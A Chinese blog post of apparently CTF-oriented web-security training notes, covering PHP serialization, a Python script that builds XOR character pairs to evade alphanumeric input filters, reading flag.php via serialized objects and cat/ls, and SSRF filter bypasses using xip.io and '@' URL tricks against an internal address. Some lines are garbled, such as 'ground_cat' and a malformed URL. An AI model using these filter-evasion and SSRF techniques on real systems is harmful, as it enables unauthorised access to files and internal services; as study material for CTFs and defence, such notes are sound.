web 培训的 知识点

本文介绍了Web开发中序列化和反序列化的基本概念,通过Python代码展示了如何创建可用字符串,并讨论了利用字符异或进行非法操作的潜在风险。此外,提到了文件盲注和Linux命令过滤时的应对策略,如使用ground_cat绕过限制。最后,讲解了SSRF攻击中的xip.io技巧和URL构造方法。
摘要由CSDN通过智能技术生成

一.关于序列化和反序列化的初步理解

serialize() 这个函数是将传入的东西进行序列化;

unserialize() 这个函数是将传入的东西进行反序列化;

 

传值的时候当A-Z a-z 0-9 _ 这些字符被过滤的时候,用其他的字符进行python异或的代码,用俩字符异或进行读取相应的文件。

#encoding=utf-8

import re

word=''

re_search="[0-9a-zA-Z_]"            #正则匹配不要的

flag="get"                           # 需要亦或出来的字符串 //这里输入你想改的字符,比如getFlag啥的

 

for i in range(32,126):

    # print(chr(i))

    if re.search(re_search,chr(i))==None:

        # print(chr(i))

        word+=chr(i)

 

print("可用字符串有:",word)

 

for i in word:

    for j in word:

        if chr(ord(i)^ord(j)) in flag:

            print((i),(j),chr(ord(i)^ord(j)))

 

输出的字符随便用,只要记得在俩字符间加  ^  符号。

 

一些盲注,然后通过ls的方式爆当前目录的文件

爆当前目录的文件

<?php

Class  Test

{

    public $key='flag.php';

}

$b= new Test();

$b->key = 'flag.php';

echo serialize($b); //先序列化一遍

echo md5('O:4:"Test":1:{s:3:"key";s:8:"flag.php";}'); //代码序列化之后用md5加密,然后hash传值

?>

 

最后访问,去爆flag.php的内容,一般有 cat 这个函数直接爆,

有时候 ls不会爆所有文件

 在注入的时候 要用 ground_cat

 

 关于linux的指令

当大部分常用的指令被过滤的时候,可以去http://www.runoob.com/linux/linux-command-manual.html?tdsourcetag=s_pctim_aiomsg寻找还没过滤的指令,然后去构建指令。

 

SSRF

xip.io

url=http:/url=http://www.10.10.10.10.xip.io 

 

使用@

http://A.com@10.10.10.10

http://A.com:B@10.10.10.10

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值